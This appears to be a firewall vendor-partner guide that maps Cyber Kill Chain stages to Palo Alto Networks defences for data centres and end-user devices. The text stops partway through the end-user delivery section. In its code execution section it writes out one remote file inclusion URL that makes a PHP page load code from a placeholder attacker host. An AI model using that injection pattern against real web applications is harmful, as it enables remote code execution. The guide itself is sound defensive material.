Network Security Best Practices for Palo Alto Networks Next-Generation FireWalls

We put our five years of experience in designing, implementing, supporting and managing Palo Alto Networks solutions together and wrote this guide to share our best practices to secure an enterprise network using Palo Alto Networks Next-Generation FireWalls.

 

The single most important message which we would like to bring across is that that there is no magic box that does everything on its own and any threat prevention technique like AV, IPS or URL Filtering can be evaded and as such doesn’t provide 100% security on its own. The solution is what I like to call the magic sauce, which is to put the right combination of threat prevention techniques together to make it close to impossible for an attacker to evade all of them. This is what this blog post is all about, to provide an overview of the approaches used by hackers to infiltrate a network and explain the threat prevention techniques and best practices to mitigate attacks.

 

If you are interested to learn more, then you should also consider our official Palo Alto Networks training like the new PAN-EDU-231 Advanced Threat Management course where we teach you the insights and best practices on cyber threats and how to protect your enterprise network effectively in real life.

 

1. Summary

 

The main objective of this document is to provide enterprises with a framework under which they can implement and maintain security best practices to defend their network and valuable IT infrastructure.

 

Information security requires a holistic approach that involves many areas of information technology. In this document, we are focusing on network security and the different threat prevention techniques used to defend against Advanced Persistent Threats “APTs”.

 

The Cyber Kill Chain, a term first used by Lockheed Martin, describes a sophisticated, stealthy and continuous computer hacking process which attackers use nowadays to target their victims. The challenge for any hacker is to successfully go through every single stage in this chain to accomplish the end-goal of either attacking the IT infrastructure directly or using the infrastructure as a resource for other criminal activity. The challenge for the company is to defend each link and stop the attack at the earliest possible stage along the kill chain, successfully defending itself against the entire Advanced Persistent Threat. In reality however, 100% security is not possible, every threat prevention technique can be evaded and cyber criminals have been very successful at doing so. For instance a recent whitepaper from the SANS Institute “Beating the IPS” shows that every Intrusion Prevention System “IPS” from every vendor, can be evaded. A good analogy is the human immune system. A healthy lifestyle will keep us fit but for example, there is no total protection from viral infection. However being sick isn’t the end of the world as long as the body is able, or sometimes with medical intervention, enabled to effectively defend itself and mitigate the impact of the infection. There is however a big difference between us humans and an IT system. We know when we feel sick and we instinctively know when to go to the doctor. Getting this level of intelligence into an IT infrastructure is difficult and expensive.

 

Enterprises should therefore adopt the approach of visibility, control and threat prevention. The Palo Alto Networks Next-Generation FireWall can provide the visibility necessary to allow a company to determine exactly what needs to be protected. Controlling the use of applications will not only ensure appropriate usage of the network but also reduce the attack surface which will establish the foundation for a secure network. The final step is to implement different threat prevention techniques at every step of the cyber kill chain as it is the combination of different threat prevention techniques which reduces the ability to evade all of them and in turn provide the enterprise with the best possible security defence.

 

This document focuses on the two main targets of the IT infrastructure, the data centre and end-user devices. In order to secure these targets, enterprises need to understand where the risk exists and how they might be attacked. Therefore we will first outline the common techniques used by attackers along the cyber kill chain to infiltrate these targets and then describe the recommended threat prevention techniques which should be implemented and maintained to defend them.

 

If you are interested to learn more, then you should also consider our official Palo Alto Networks training like the new PAN-EDU-231 Advanced Threat Management course where we teach you the insights and best practices on cyber threats and how to protect your enterprise network effectively in real life.

 

 

Table of Contents

 

1. Executive Summary
2. Data Center

2.1. Kill Chain Step 1 – Reconnaissance
2.2. Kill Chain Step 2 – Weaponization
2.3. Kill Chain Step 3 – Delivery
2.4. Kill Chain Step 4 – Exploitation
2.5. Kill Chain Step 5 – Installation
2.6. Kill Chain Step 6 – Command and Control (C2)
2.7. Kill Chain Step 7 – Actions on Objectives

3. End-user Devices

3.1. Kill Chain Step 1 – Reconnaissance
3.2. Kill Chain Step 2 – Weaponization
3.3. Kill Chain Step 3 – Delivery
3.4. Kill Chain Step 4 – Exploitation
3.5. Kill Chain Step 5 – Installation
3.6. Kill Chain Step 6 – Command and Control (C2)
3.7. Kill Chain Step 7 – Actions on Objectives

4. Monitoring

4.1. Reporting

 

 

2. Data Centre

 

Data centres, and by this we mean servers or any other devices which are not directly operated by a human, generally provide services and with this have to be available to a wide audience. This presents a broad threat surface for attacks as the server has to process data and with this as well malicious code which can be used by attackers to exploit software vulnerabilities. With this, data centres share a common threat vector as they provide services that are based on software which by its nature has bugs or even features which adversaries can exploit. Once this has been accomplished, the intruder gets access to the system where he can take actions to realise his objectives, which might be to violate the confidentiality, integrity, or availability of a system or move laterally inside the network.

 

2.1. Kill Chain Step 1 – Reconnaissance
At the Reconnaissance stage, the attacker acts still outside the trusted environment to which he tries to gain access.

 

2.1.1. Possible Action by the Attacker (Risks)
At this stage, the intruder tries to gather information in order to identify and select a possible target.

 

Possible attacks are:

  • Host Sweep – Scan of a range of IP addresses to identify live hosts
  • Port Scan – Scan of a range of TCP or UDP ports to identify services running on the host
  • Information Disclosure Attack – Scan of a service to acquire system-specific information like the software vendor, name and version which could be used to identify possible vulnerabilities of the specific software

 

2.1.2. Threat Prevention Techniques for Mitigation & Defence

  • Zero Trust Access Control – Services should only be made available to the users who need to access them. Such access can be controlled by the security policy to allow communications only from the required sources. In the case where a service needs to be made available to the internet then access can be restricted on a per-country basis. Either site-to-site VPN tunnels or the GlobalProtect remote access VPN should be used to provide access to services for a manageable group of 3rd parties instead of allowing direct access from the internet. This especially applies to services that provide direct system access like remote desktop, telnet or SSH as these are prone to brute force attacks.
  • Block access from high-risk sources – Attacks are often launched from what can be called the bad neighbourhoods of the internet. These are often countries with a high infection rate of devices, under the control of cybercriminals “BotNets”. If access to a service cannot be limited to specific countries then communication should be blocked from countries where attacks are seen but no legitimate customer requests can be expected. Instead of blocking entire countries, access from blacklisted IP addresses should be considered as a large percentage of attacks originate in high profile countries like the United States, Germany and the UK from which services often have to be reachable. IP blacklists are available from organisations such as OpenBL or similar commercial services. The Next-Generation FireWall can automatically update such blacklists by using the “Dynamic Block Lists” feature.
  • Application Control (Inbound) – One of the most effective methods to prevent network threats is the implementation of a positive application allow list as it significantly reduces the attack surface and with this the attack-ability of a service. With such application-based access control, only applications that are explicitly configured in the security policy are allowed and consequently, all others are blocked. Data centre usually provide a set list of applications which can easily be identified using the reporting capabilities of the Next-Generation FireWall. Caution should be taken when analysing the traffic log with any application which has generated a high amount of sessions but a small volume of traffic as such communications, especially inbound from the internet, could have been attempts by intruders to scan internet-facing services for vulnerabilities. Some legitimate business applications may not be identified by the Next-Generation FireWall as they might be proprietary or not widely used applications. Before blocking any unknown applications, it is therefore important to identify such legitimate applications and allow them by defining a custom application signature. Application override should not be used for any internet facing services as this disables security profiles and with this the capability to scan the traffic for known threats.
  • Zone Protection – Reconnaissance protection is part of the zone protection profile and can detect and block host sweeps as well as TCP & UDP port scans. Zone protection profiles are applied to the zone where the traffic enters the FireWall. It is highly recommended to enable this feature on external zones. For internal zones however, it needs to be verified that settings will not negatively affect any monitoring tools which often use the same scanning techniques to determine if servers and services are up and running. The standard thresholds are a good starting point. However they should be customized by changing the action to alert, lowering the threshold and monitoring the threat log to verify if any legitimate communications raise an alert.
  • Vulnerability Protection – A vulnerability protection profile should be applied to detect and block information leakage attacks.

 

2.2. Kill Chain Step 2 – Weaponization
Weaponization is the stage where the adversary is preparing the exploit as a deliverable payload. This stage does not involve any communication by the attacker and as such cannot be directly prevented but also does not impose any direct risks. However, enterprises should note that the threat landscape has changed tremendously over the last couple of years. We are now seeing highly sophisticated attacks executed by novices simply made possible by the new business model of cybercrime “Hacking as a Service”. Instead of taking the risk of attacking themselves, incredibly skilled and intelligent hackers now earn money by developing easy to use tools that enable less-skilled criminals to weaponise themselves for the execution of sophisticated attacks.

 

2.3. Kill Chain Step 3 – Delivery
At this stage, the attacker tries to deliver the malicious code to the target. This is the transition stage where the attack goes from the outside to the inside.

 

2.3.1. Possible Action by the Attacker (Risks)

Common attacks at this stage are:

  • Code Execution – Code execution describes an attack where the attacker is able to inject malicious code into an application which is then interpreted/executed by the application. This type of attack exploits poor handling of untrusted data and is usually made possible due to a lack of proper input/output data validation. For example, if a web application passes a parameter sent via an HTTP GET request to the PHP include() function with no input validation, the attacker may try to execute code other than that which the developer had in mind. So for instance the normal URL could look like this “http://testsite.com/index.php?page=contact.php” and an attacker could change to something like this “http://testsite.com/?page=http://evilsite.com/evilcode.php” to try to instruct PHP to run its own malicious code instead. With code execution, an attacker is limited by the functionality of the language into which the code was injected which limits the scope for which this attack can be used for. However, the attack surface or exposure is very high as every web application can be targeted by such an attack.
  • Command Execution – With command execution, an attacker tries to execute arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data like forms, cookies or HTTP headers to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation. This attack differs from code execution, in that code execution allows the attacker to execute its own code by an application while command execution runs operating system commands.
  • SQL Injection – A SQL injection is a specific type of a command execution attack which consists of an injection of a SQL query via the input data from the client to the application. A successful SQL injection exploit can for instance read sensitive data from the database, modify database information, execute administration operations on the database and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.
  • Buffer Overflow – A buffer overflow condition exists when a program attempts to put more data in a buffer than it can hold or when a program attempts to put data in a memory area past a buffer. In this case, a buffer is a sequential section of memory allocated to contain anything from a character string to an array of integers. Writing outside the bounds of a block of allocated memory can corrupt data, crash the program, or cause the execution of malicious code. So for instance attacker can use buffer overflows to corrupt the execution stack of a web application by sending crafted code which can then cause the web application to execute malicious code.

 

2.3.2. Threat Prevention Techniques for Mitigation & Defence

  • SSL Decryption (SSL Inbound Inspection) – SSL is widely used to secure communications in order to guarantee the authenticity, integrity and confidentiality of the transferred data. However, this also means that if an application uses SSL then all the data transferred over the firewall is encrypted. Therefore SSL inbound inspection should be enabled especially for all Internet-facing applications. With this, the firewall will decrypt the data which will enable it to identify applications inside the SSL tunnel as well as block the various types of attacks. Please note that the amount of SSL inbound certificates is limited. So for instance PA-3020 supports up to 25 SSL inbound certificates which means that inbound SSL decryption can be enabled for up to 25 different domain names.
  • IPS – An IPS Vulnerability profile should be applied to detect and block the various types of known attacks described above. Dedicated profiles should be applied to internet-facing applications with a more rigid policy. As a starting point, it is recommended to block any threats with a severity of critical, high and medium for host type server which means that these apply to all traffic sent from a client on the internet to the webserver. Critical threats for host type client (traffic sent by the server to the client) should be blocked as well while the action for all other severities and types should be set to follow the default action. Further customization based on the detected threats is highly recommended. Packet captures should be enabled in each vulnerability protection rule as these capture the malicious code which was sent by the attacker which provides additional information for analysis as well as proof of the attack.

 

 

2.4. Kill Chain Step 4 – Exploitation
At this stage, the malicious code has been delivered to the target where it can attempt to trigger exploitation of a vulnerability and the attacker is now acting inside the trusted environment. An exploit is a sequence of commands that takes advantage of a bug or vulnerability in a software application or process. Attackers use exploits as a tool to access and use a system to their advantage. To gain control of a system, the attacker must bypass a chain of vulnerabilities in the system. Blocking any attempt to exploit a vulnerability in the chain will block the exploitation attempt entirely.

 

The transfer of the malicious code traverses the firewall at the previous stage where it will be blocked, only if the malicious code triggers a signature match of a known threat. The exploit itself however can only be detected and blocked on the end system e.g. the server itself and as such is outside the control of the firewall. The prevention of exploits on the target is therefore outside the scope of this document. However, we still would like to point out possible solutions like Palo Alto Networks Advanced Endpoint Protection called “Traps”.

 

In a typical attack scenario, an attacker uses attempts to gain control of a system by first attempting to corrupt or bypass memory allocation or handlers. Using memory-corruption techniques such as buffer overflows and heap corruption, the hacker can then trigger a bug in the software or exploit a vulnerability in a process. The attacker must then manipulate a program to run code provided or specified by the attacker and evade detection. If the attacker gains access to the operating system, the attacker could then upload Trojan horses, malware programs that contain malicious executables, or otherwise use the system to their advantage which is the next step in the kill chain (step 5 installation).

 

Classical AntiVirus solutions employ signatures to identify executables, dynamic-link libraries (DLLs), or other pieces of code as malicious. The weakness of this method is that signature-based solutions first need to identify newly created threats (also known as Zero-Day attacks or exploits) and then add them to lists of known threats before they will be detected, leaving the endpoint vulnerable until the signatures are updated.

 

Attackers rely on a small number of exploit techniques like buffer overflows and heap sprays to trigger a bug in the software. Palo Alto Network’s “Traps” prevents exploit attempts by blocking these exploit techniques rather than trying to identify the malware based on its signature which makes it possible to block even zero-day attacks and vulnerabilities which are still unknown.

 

 

When a service starts on the server the Traps agent seamlessly injects drivers into the software process at the earliest possible stage before any files belonging to the process are loaded into memory. If the process then opens the file, Traps injects a code module called an Exploitation Prevention Module (EPM) into the process. The EPM targets a specific exploitation technique and is designed to prevent attacks on program vulnerabilities based on memory corruption or logic flaws.

 

Examples of attacks that the EPMs can prevent include:

  • Memory corruption
  • Java code from running in browsers, under certain conditions
  • Executables from spawning child processes, under certain conditions
  • Dynamic-link library (DLL) hijacking (replacing a legitimate DLL with a malicious one of the same name)
  • Hijacking program control flow
  • Inserting malicious code as an exception handler

 

In addition to automatically protecting processes from such attacks, Traps reports any prevention events to the Endpoint Security Manager and performs additional actions according to the settings of the policy rules. Common actions performed by TRAPS include collecting forensic data and notifying the user about the event. Traps neither relies on nor performs any additional scanning or monitoring actions which makes it a lightweight application with very little CPU and memory usage.

 

2.5. Kill Chain Step 5 – Installation
At stage 5, the attacker tries to install a remote access trojan “RAT” or backdoor on the target to maintain persistence inside the environment. At this point, it is important to understand the difference between an exploit which we described in the previous two stages and executable malware like a Trojan or backdoor. For an advanced persistent threat, the attacker needs to establish persistence on the target which means that he has to establish full remote access and control on the victim’s device while evading detection. At the exploit stage, the attacker is however still limited by the functionality of the language into which the code was injected. Even shell access, which he might have gained through a command execution attack, is still limited to the operation of the shell of the operating system which does not provide any advanced functionality like key-logging. In addition, such shell access is usually logged, which makes it difficult to evade detection. Therefore the attacker relies on the download of additional executable software like a Remote Access Trojan “RAT” which will provide all the necessary functionality to gain full remote access independent of the exploited application as well as additional tools to for instance monitor the victim’s activity.

 

2.5.1. Possible Action by the Attacker (Risks)
At the installation stage, the attacker uses the elevated access which he has gained through the previous exploitation stage to execute commands or code which instructs the target device to download the RAT or backdoor. The biggest risk exists if a server has internet access because it means that the server itself can establish a connection to the internet to download the malware. Most servers require internet access to download updates. This is important as software updates are still one of the cornerstones of a secure IT infrastructure as they reduce the attack surface by patching security vulnerabilities. However, if a legacy port-based firewall allows Internet access to the server then it will also allow the download of malware from any source on the Internet. The restriction based on the destination IP addresses is usually not an option as legitimate applications like Microsoft update use content delivery networks with randomly changing IP addresses.

 

Once downloaded, the RAT will install itself often with rootkit capabilities, which enable the malware to embed itself deeply and stealthily into the operating system. Because of this, it evades detection by hiding the existence of certain processes or programs. Most AntiVirus solutions will neither be able to detect nor remove such rootkit enabled RATs.

 

2.5.2. Threat Prevention Techniques for Mitigation & Defence

  • Application Control (Outbound) – One of the most effective methods of preventing network threats is the implementation of a positive application allow list, as it significantly reduces the attack surface and with this the attack-ability of a network. With this, only applications that are explicitly configured in the security policy are allowed and consequently, all others are blocked. For internet access, servers usually require only a relatively small number of applications like “ms-update” and other software update applications. If only such specific applications are allowed then general file download applications like FTP, web-browsing, SSL or ssh which attackers often try to use to download malware are blocked automatically. Please note that SSL decryption is required to identify applications inside any HTTP based communication.
  • URL Filtering – URL Filtering is another way to restrict services that can be accessed on the internet especially if general web applications like “web-browsing” or “SSL” have to be allowed. For datacentres, explicit custom URLs should be defined and used in the security policy as match criteria to allow server only access to specific URLs. If broader access is required then high-risk categories like malware, dynamic-DNS, web-advertisements, unknown, proxy-avoidance-and-anonymizers, phishing, peer-to-peer, parked and hacking should be blocked.
  • File Blocking – File Blocking is one of the most reliable threat prevention techniques at this stage of the kill chain as it is capable of blocking the download of executable files. This is important because the advanced functionality of a RAT can only be delivered in form of a fully compiled software or portable executable “PE” file. A file blocking profile should therefore be applied to all security policies which allow Internet access to block the download and upload of “PE” files. The Next-Generation firewall will also detect PE files inside of zip files and if detected, block the entire zip file. Data inside of encrypted files like “encrypted-zip” or “encrypted-rar” cannot be decrypted and should therefore also be blocked. The download of legitimate files from trusted sources can explicitly be allowed through dedicated security policies based on applications and URLs. Please note that SSL decryption is required to analyse files inside any HTTP based communication.
  • Anti-Virus & Anti-Spyware – If file downloads are allowed from trusted sources then these files should still be scanned by an Anti-Virus and Anti-Spyware profile because there is no guarantee that for instance the webserver of a trusted partner or even a high profile company will not be compromised by malware. Please note that Anti-Virus and Anti-Spyware are only capable of blocking already known malware and SSL decryption is required to scan files inside any HTTP based communication.
  • Zero-day malware detection and prevention (Wildfire) – Classical AntiVirus solutions provide only limited protection against modern malware as they are highly polymorphic i.e. they constantly change their signatures to effectively avoid detection by signature-based AntiVirus. If file downloads are allowed from trusted sources, these files should also be analysed by WildFire because there is no guarantee that for instance the webserver of a trusted partner or even a high profile company will not be compromised by malware. At the same time, there is a high probability that the malware is not detected by classical Anti-Virus. WildFire extends the Next-Generation FireWall to identify and block targeted and unknown malware (0-day) by actively analysing unknown malware in a safe, cloud-based virtual environment, where Palo Alto Networks can directly observe malicious malware behaviours. WildFire automatically generates protections for newly discovered malware, and delivers these protections globally, enabling all customers to benefit from the analysis. A basic WildFire service is included in the base system of the Next-Generation FireWall to analyse PE files while signature updates are delivered on a daily basis as part of the threat prevention subscription. An immediate delivery of signatures (every 15min), as well as the analysis of Java, Flash, PDF, Microsoft Office, Android APK files and E-Mail links, requires an additional Wildfire subscription. Please note that SSL decryption is required to analyse files inside any HTTP based communication.
  • SSL Decryption (SSL Forward Proxy) – SSL decryption should be enabled especially for all communication with the Internet. This will allow the firewall to decrypt the data which will enable it to identify applications and malware inside the SSL tunnel as well as block high-risk files.

 

2.6. Kill Chain Step 6 – Command and Control (C2)

 

At the command and control stage, the remote access trojan “RAT” on the compromised host will establish a communication channel to the attackers command and control “C2” server. Once the C2 channel has been established, the intruder has “hands on the keyboard” access to the compromised host inside the target environment.

 

2.6.1. Possible Action by the Attacker (Risks)

Persistence is one of the main objectives of an APT. This means in case the command and control “C2” server is no longer reachable, because for instance it has been taken down by law enforcement, then the RAT on the compromised host has to again establish a C2 channel to a new C2 server in order for the attacker to re-establish control. Attackers achieve this resilience by using DNS which easily enables them to point their command and control domain to a new IP address. More sophisticated malicious operations on the internet even use a technique called “Fast-flux” which constantly changes the mapping of the IP address to the domain. This enables the attacker to build a network that obscures his true location as all connections are proxied through a constantly changing layer of IP addresses.

 

Once the RAT has resolved the IP address of its C2 server via DNS it will establish the C2 channel. Blocking these C2 channels can be challenging with legacy port-based firewalls as applications can use any TCP or UDP port number to communicate and therefore the assumption, based on which port-based firewalls are designed, that a specific port equals a specific application is no longer true. The same applies to command and control communication of malware which often uses port numbers of common applications like web-browsing (port 80) or DNS (port 53) to evade detection.

 

2.6.2. Threat Prevention Techniques for Mitigation & Defence

  •  Application Control (Outbound) – The Next-Generation FireWall identifies any type of network communication as an application, independently of the port. It is obviously impossible to know every application which possibly exists and therefore all network communications which cannot be associated to a list of well-known applications will be identified as either “unknown-udp” or “unknown-tcp”. Blocking these unknown applications is one of the most effective prevention techniques for command and control traffic as C2 channels are mostly proprietary applications which are identified as unknown by the Next-Generation FireWall and therefore blocked even if it is a completely new type or zero-day command and control application which hasn’t been seen before.
  • DNS Sinkhole – Palo Alto Networks identifies malicious command and control domains using its threat intelligence cloud “Wildfire”. Once Wildfire identifies new malware based on its behaviour, it also knows the domain to which it attempted to connect to establish a command and control channel. These domains are then delivered to the firewall as part of the Anti-Spyware protection which enables the firewall to block them. A challenge which arises out of this however is that most devices send DNS queries to a DNS server. The DNS server then sends these queries over the firewall to the internet. If the firewall blocks a DNS request with a malicious domain then the originator is the DNS Server and not the compromised host. DNS sinkholing is an additional feature which solves this visibility problem by forging responses to the client’s host queries directed at malicious domains. Clients then attempting to connect to malicious domains for command-and-control will instead connect to a sinkhole IP address defined by the administrator. Infected hosts can then be easily identified in the traffic logs as any host that attempts to connect to the sinkhole IP address are most likely infected with malware.
  • Anti-Spyware – Similar to command and control domains, Wildfire also identifies the command and control channel communication of newly identified malware. Signatures for such command and control traffic are then delivered to the firewall as part of the Anti-Spyware protection which enables the firewall to block them.

 

2.7. Kill Chain Step 7 – Actions on Objectives

 

Only at the last stage, after progressing through the first six phases, can intruders take actions to achieve their original objectives.

 

2.7.1. Possible Action by the Attacker (Risks)

Typically, the objective of the attacker at this stage is data exfiltration. This involves collecting, encrypting and extracting information from the victim environment; violations of data integrity and or availability are also potential objectives. Alternatively, the intruders may only desire access to the initial victim device for use as a hop point to compromise additional systems and move laterally inside the network or simply use the compromised host for other criminal activity like sending out spam e-mails, participate in click-fraud or launch denial of services attacks against other victims.

2.7.2. Threat Prevention Techniques for Mitigation & Defence

  • Zero Trust – At stage 7, the host has been fully compromised and is under total control of the attacker. The best defence strategy at this stage to “Survive” is by limiting the possible damage. So for instance a web server is highly exposed to attacks as it is directly reachable from the internet but compromising a single web server might not be sufficient for the attacker to achieve its objective of data exfiltration as the valuable data is mostly stored on the application and database servers. Granular network segmentation based on a Zero Trust Architecture with the principles of “Never Trust – Always Verify” will contain the attack at a boundary that will limit the possible damage.
  • Data Filtering – The Next-Generation FireWall provides the capability to identify and block unique data patterns in network communication. This data filtering feature can be used to identify and stop the exfiltration of data. The functionality can be compared to a data loss prevention “DLP” solution even though it is not as extensive.

 

3. End-user Devices

 

End-user devices, which can be fixed or mobile devices, share a common threat vector as they are all operated by a human being. Such end-user devices usually do not host any services which significantly reduces the attack surface for an attack i.e. an attacker as easily send malicious code directly to the devices to exploit a software vulnerability as we have seen in the previous section. Therefore the first step for an attacker is to target the human factor by baiting the user to initiate the compromise either by, clicking on a link, opening a file, or any other activities which enable the attacker to load malicious code onto the device.

 

In 2011, RSA was the target of a spear-phishing attack made successful by just one employee opening the malicious attachment even after their spam filter had correctly placed the email in the “junk” folder. RSA suffered a severe data breach as a result.

 

Educating users on cybersecurity is important but there is no 100% immunity against social engineering in the same way that there is no total protection from any threat prevention technique on its own. So blaming the end-user is not the solution as he is only one element in the chain and the attacker still has to successfully go through several other stages to accomplish his objective. For this reason, the same principle applies to end-user devices, that is, only a combination of different threat prevention techniques aligned in the right way at every stage of the cyber kill chain will provide an adequate defence.

 

3.1. Kill Chain Step 1 – Reconnaissance

At the Reconnaissance stage, the intruder tries to gather information in order to identify and select a possible target. This stage does not involve any direct communication by the adversary to the target and as such cannot be prevented by the Next-Generation FireWall however, it still has to be taken seriously as a couple of basic preventative measurement by the user can avoid an attack even at this early stage.

 

Based on the objectives of the adversary we need to differentiate if the enterprise could be a direct or indirect target. As a direct target, the adversary’s specific objective is to infiltrate the company directly to for instance extract or manipulate data. As an indirect target, the attacker’s main objective is to take control of any available device to use for other criminal activity. This makes everyone a potential target even if there are no obvious reasons to infiltrate an enterprise directly.

 

Exploiting the human factor, the most effective attacker strategy is a spear-phishing attack, targeting a specific individual or group of people in a specific organisation. So if an attacker has an objective to infiltrate a specific company then he will explore the interests of his target to make a phishing e-mail look more authentic by appearing to originate from a legitimate organization or individual and contain role-relevant or topic-of-interest content to entice its intended target. Preventing a direct attack at this early stage of reconnaissance is close to impossible because every enterprise and individual has freely available information about themselves which can be used by adversaries.

 

With an indirect attack, however, the intruder takes more of an opportunistic approach where he tries to find as many targets as possible for instance by crawling the web for e-mail addresses and then focuses on the weakest possible target. With this users can take simple measures to protect their private data like for example, not making their e-mail address freely available.

 

3.2. Kill Chain Step 2 – Weaponization

 

Weaponization is the stage where the adversary is preparing an exploit as a deliverable payload like for instance preparing an e-mail with a malicious attachment. This stage does not involve any communication by the attacker and as such cannot be directly prevented but also does not impose any direct risks. It is however still important to have an understanding on the techniques employed by the attacker at this stage. The following is a real live example of an “Infostealer Campaign” taken from the Palo Alto Networks Blog which illustrates the craftsmanship of the attacker at the weaponisation stage and the power of social engineering to influence a person.

 

The campaign started with an email sent to an employee responsible for processing financial statements at a global financial organization (Figure below). The sender’s email address was spoofed as originating from an energy company. The subsequent analysis would show that this façade was very thin; yet, it is often all that is required to encourage a user to open an attachment or click on a link that then executes malicious code.

 

This e-mail employs common pressure tactics for phishing messages. Specifically, it touches on two areas of potential concern for a target: financial responsibility and the introduction of a state of uncertainty and confusion. In this case, the role of the target as a processor of financial statements might mean that the target is accustomed to receiving similarly structured legitimate e-mails; accordingly, they may open a malicious attachment without a second thought.

 

The second factor is much broader and relates to how humans deal with uncertainty. Without specific awareness and training, some users may be inclined to open the attachment, wondering why the e-mail was sent to them. In psychology, this is referred to as the “Need for Closure” personality trap.

 

The next layer of this attack is found within the malicious DOC file once a victim opens it. With a system properly configured to protect against automatic execution of macros, no malicious code has been run at this point. The Figure below presents a screenshot of the malicious attachments displayed contents.

 

This content further compound the two points of concern for the target, and now presents a convenient option of clicking on “Enable Content” to obtain closure on the matter. Despite a security warning, a number of users still choose to enable respective content, allowing for malicious macros to run on their system. After enabling macros, none of the promised data is shown to the victim; however, the malicious macro script executes in the background without the user’s knowledge.

 

3.3. Kill Chain Step 3 – Delivery

 

At this stage, the attacker tries to deliver malicious code to the target. This is the first stage where the attack goes from the outside to the inside and where it could be stopped by the Next-Generation FireWall.

 

1.3.1. Possible Action by the Attacker (Risks)
Based on Palo Alto Networks latest Threat Landscape Review, the two main channels for malware delivery are E-Mail and Web browsing.

 

E-Mail can be used to deliver malicious code directly as an E-Mail attachment or by luring the user to click on a link inside the E-Mail which will then deliver the malware via web browsing (see below). Enterprises often spend a considerable amount on E-Mail security solutions to secure their corporate E-Mail but then at the same time allow their employees to use private web-based E-Mail. Such private web-based e-mail often only provides moderate security protection to block malicious attachments and evades detection through the use of SSL encryption which makes it an ideal channel to malware by circumventing corporate e-mail security.

 

Web Browsing requires the attacker to place malware on a webpage which ideally is very popular and visited by a lot of potential victims. Common targets are often webpages of smaller companies who once paid a web development firm to set up their webpage with one of the common content management systems like WordPress or Drupal. The company then only manages the content of the webpage but does not update the software of the content management system itself which makes it an easy target once a new vulnerability has been discovered for this system.

 

Once an attacker has compromised a webpage, he can deliver malicious code to the user’s device in mainly two different forms. The first option is to embed malicious code directly into the webpage which is then loaded by the user’s browser and with this can exploit vulnerabilities of the browser itself or any plug-ins loaded by the browser. The other option is to get the user to download a file like a PDF which can exploit vulnerabilities in the software that opens the file or even directly download malware in form of a portable executable file that can be run on the victims PC.

 

Another way to distribute malicious code via web browsing is to use an advertisement network. Webpages that provide space for advertisement are loading code from the advertisement company every time the webpage is loaded. With this, an attacker can buy advertisement and distribute malicious code through for instance flash videos. The risk for the attacker’s malicious code to get blocked by the advertisement firm is high but if it is not detected then it provides high leverage as the malicious code is automatically distributed to hundreds of web pages that serve thousands of users.

 

Another important aspect to take into account with web browsing is encrypted traffic. SSL is widely used to secure communications in order to guarantee the authenticity, integrity and confidentiality of the transferred data. For the very same reason, sophisticated malware and cybercriminals are using SSL to evade detection and with this are able to deliver malware into corporate networks and evade detection. It is important to note that the volume of SSL on the network is not the criteria to enable or disable SSL decryption because the risk evolves based on the fact that there is the possibility to evade detection by using SSL. The traffic volume generated by modern malware is often very low.

 

1.3.2. Threat Prevention Techniques for Mitigation & Defence

  • Application Control (Outbound) – Application control, in the form of a positive application allow list which only allows specific applications and blocks the remaining, is a fundamental threat prevention technique at this stage of the kill chain as it significantly reduces the attack surface. Non-corporate e-mail applications including web-based e-mail as well as IMAP and POP3 should be blocked while SMTP should only be allowed to and from the corporate e-mail server.
  • SSL Decryption (SSL Forward Proxy) – SSL decryption is essential to detect and block any type of malware as well as applications inside an SSL tunnel. Both from a privacy and performance point of view it is not recommendable to decrypt all SSL traffic. Therefore a policy should be defined which explicitly excludes trusted applications and URLs from SSL decryption which have a low risk to deliver malware like for instance Microsoft-Update as well as sensitive URL categories like financial services. All other traffic should be decrypted as especially sophisticated malware is hiding inside the remaining unknown traffic. Special attention should be paid to URL categories like web-based-email, social-networking and online-storage-and-backup as these applications could be used to transfer sensitive information but on the other side are known to be used to distribute malware as well. The implementation of SSL Forward Proxy requires every client on the corporate network to trust an internal root certificate authority “CA” which can either be a CA Certificate generated by the Next-Generation FireWall itself or an existing Corporate CA.
  • URL Filtering – URL Filtering should be applied to all internet related policies to block access to any high-risk categories like malware, web advertisements, proxy-avoidance-and-anonymizers, phishing, peer-to-peer, parked and hacking. Especially URLs categorised as “unknown” should be blocked as well because adversaries frequently register new domains which might not have been detected yet. After initial implementation of the Next-Generation FireWall, it is recommended to review and re-categorize any known URLs which are categorized as unknown and then block the “unknown” URL category after such an initial grace period. Palo Alto Networks PAN-DB URL Filtering solution is supported by its threat intelligence cloud “WildFire” which makes it very effective in blocking access to URLs that distribute malware. So for instance, if WildFire identifies a new malicious file then it also knows the URL from which it was downloaded and this URL is then categorised as malware by PAN-DB. With a valid WildFire subscription, the Next-Generation FireWall can also extract HTTP/HTTPS links contained in SMTP and POP3 email messages and forward the links to the WildFire cloud for analysis. WildFire will then visit the links to determine if the corresponding web page hosts any exploits. If it detects malicious behaviour on the page then it will generate a detailed analysis report and log it to the WildFire Submissions log on the firewall that forwarded the links. This log includes the email header information (email sender, recipient and subject) so that the message can be identified and deleted from the mail server and/or track down the recipient and mitigate the threat if the email has already been delivered and/or opened. The URL is also added to PAN-DB and categorized as malware which will automatically block any users from visiting the webpage.
  • Anti-Virus – An Anti-Virus profile should be applied to all internet related policies to block known viruses. The action for all decoder related to file transfers (FTP, HTTP, smb) should be set to block on both normal Anti-Virus and Anti-Virus signatures from Wildfire. For SMTP the action should be set to block as well which will send a “541 – Recipient Address Rejected – Blacklist, Anti-Spam, Mailfilter/Firewall Block” response back to the sending SMTP server to prevent it from resending the blocked message. For POP3 and IMAP it is technically not possible to clean files or properly terminate an infected file-transfer in-stream without affecting the entire session due to shortcomings in these protocols to deal with this kind of situation. Therefore they should be kept at the default action “alert” while the applications themselves should be blocked as part of the application control in the security policy.
